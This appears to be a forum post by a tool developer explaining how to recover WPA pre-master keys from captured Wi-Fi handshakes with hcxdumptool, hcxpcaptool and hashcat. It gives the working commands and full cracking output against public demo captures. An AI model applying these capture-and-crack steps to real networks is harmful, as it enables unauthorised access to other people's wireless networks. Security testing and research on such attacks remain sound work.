You can retrieve a PSK or a PMK only from a weak client. Therefore you must run hcxdumptool over a long time against your penetration target.
We can not distinguish between an ESSID, a damaged ESSID, a PSK and a PMK within wlan traffic. So we assume a 32 byte string could be possible a PMK and store this one running option -P into your list probabili-pass.
Also a PMK attack is only usefull if your penetration test target uses AKM (Authentication Key Management). Normally it is useless on PBKDF2 related networks (WPA1,
WPA2,
WPA2 key version 3).
The simplest correct commandline for hashcat is:
hashcat -m 2501 test.hccapx pmkfile
Yo can test it, running examples from here:
https://hashcat.net/forum/thread-7717-po...l#pid42813
copy PMK to pmklist
use hcxpcaptool -O option:
$ hcxpcaptool -O test.hccapx sae4way.pcapng
reading from sae4way.pcapng
summary:
file name....................: sae4way.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.16-arch1-1-ARCH
file application information.: hcxdumptool 5.0.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianness...................: little endian
read errors..................: flawless
packets inside...............: 15
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 1
probe requests...............: 1
probe responses..............: 1
association requests.........: 1
association responses........: 1
authentications (SAE)........: 4
EAPOL packets (total)........: 6
EAPOL packets (AKM defined)..: 4
EAPOL packets (
WPA2).........: 2
EAPOL PMKIDs (total).........: 1
EAPOL PMKIDs (AKM defined)...: 1
raw handshakes...............: 1 (ap-less: 0)
1 handshake(s) written to test.hccapx
$ hashcat -m 2501 test.hccapx pmklist
hashcat (v5.1.0-895-g8121073d) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-EAPOL-PMK
Hash.Target......: mynet (AP:c8:3a:35:ce:46:3f STA:c8:3a:35:c2:4f:bc)
Time.Started.....: Wed Apr 10 09:24:42 2019 (0 secs)
Time.Estimated...: Wed Apr 10 09:24:42 2019 (0 secs)
Guess.Base.......: File (pmklist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2078 H/s (0.00ms) @ Accel:1024 Loops:512 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 3fff2ed5188624e83da421f68562f1f8271884c48ed7036269cbb76480eed19b -> 3fff2ed5188624e83da421f68562f1f8271884c48ed7036269cbb76480eed19b
Hardware.Mon.#1..: Temp: 53c Fan: 39% Util: 14% Core:1835MHz Mem:5005MHz Bus:16
Started: Wed Apr 10 09:24:27 2019
Stopped: Wed Apr 10 09:24:43 2019
or from here:
https://wiki.wireshark.org/SampleCaptures
search for eap-tls and you find this:
File: wpa-eap-tls.pcap.gz
Description: 802.11 capture with WPA-EAP. PSK's to decode: a5001e18e0b3f792278825bc3abff72d7021d7c157b600470ef730e2490835d4 79258f6ceeecedd3482b92deaabdb675f09bcb4003ef5074f5ddb10a94ebe00a 23a9ee58c7810546ae3e7509fda9f97435778d689e53a54891c56d02f18ca162
download wpa-eap-tls.pcap.gz
(
https://wiki.wireshark.org/SampleCapture...ls.pcap.gz)
copy PMKs to pmklist
run hcxpcaptool and hashcat
$ hcxpcaptool -O test.hccapx wpa-eap-tls.pcap.gz
decompressing wpa-eap-tls.pcap.gz to /tmp/wpa-eap-tls.pcap.gz.tmp
reading from wpa-eap-tls.pcap.gz.tmp
summary:
file name....................: wpa-eap-tls.pcap.gz.tmp
file type....................: pcap 2.4
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianness...................: little endian
read errors..................: flawless
packets inside...............: 86
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
EAPOL packets (total)........: 4
EAPOL packets (
WPA2).........: 4
EAPOL PMKIDs (total).........: 1
EAPOL PMKIDs (
WPA2)..........: 1
EAP packets..................: 20
found........................: EAP type ID
found........................: EAP-TLS Authentication
raw handshakes...............: 1 (ap-less: 0)
best handshakes..............: 1 (ap-less: 0)
best PMKIDs..................: 1
1 handshake(s) written to test.hccapx
$ hashcat -m 2501 test.hccapx pmklist
hashcat (v5.1.0-895-g8121073d) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-EAPOL-PMK
Hash.Target......: (AP:10:6f:3f:0e:33:3c STA:24:77:03:d2:5e:a8)
Time.Started.....: Wed Apr 10 09:30:26 2019 (0 secs)
Time.Estimated...: Wed Apr 10 09:30:26 2019 (0 secs)
Guess.Base.......: File (pmklist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9880 H/s (0.00ms) @ Accel:1024 Loops:512 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4/4 (100.00%)
Rejected.........: 0/4 (0.00%)
Restore.Point....: 0/4 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 3fff2ed5188624e83da421f68562f1f8271884c48ed7036269cbb76480eed19b -> 23a9ee58c7810546ae3e7509fda9f97435778d689e53a54891c56d02f18ca162
Hardware.Mon.#1..: Temp: 44c Fan: 29% Util: 16% Core:1911MHz Mem:5005MHz Bus:16
Started: Wed Apr 10 09:30:18 2019
Stopped: Wed Apr 10 09:30:27 2019
You can see also a best PMKID, but you can't convert it for use with hashcat, because that PMKID isn't PBKDF2 based. I disabled the conversion of non PBKDF2 related PMKIDs in latest hcxpcaptool.
The EAPOL frame is converted only running option -O(!), because hashcat is able to verify AKM based EAPOL since this pull request:
https://github.com/hashcat/hashcat/commi...eb046e5047
I disabled the conversion of non PBKDF2 related EAPOL frames running option -o(!), too.
All examples only work on latest hcxdumptool, hcxtools and hashcat!
I suggest to run hcxdumptool over a long time and to collect the lists you retrieved by -E, -I -U. From time to time, run
your EAPL (hccapx) and/or PMKID (16800) hashes against this lists. Run hcxwltool on that lists
Also run hcxpsktool on the hasfiles (hccaxp and 16800).
Also we need a new hashline to distinguish between PBKDF2 (incl. crossover/reuse PBKDF2) and AKM related handshakes.
Read more here:
https://github.com/hashcat/hashcat/issues/1816
Remarks:
All used hashes and PMKs are public demo hashes and public demo PMKs!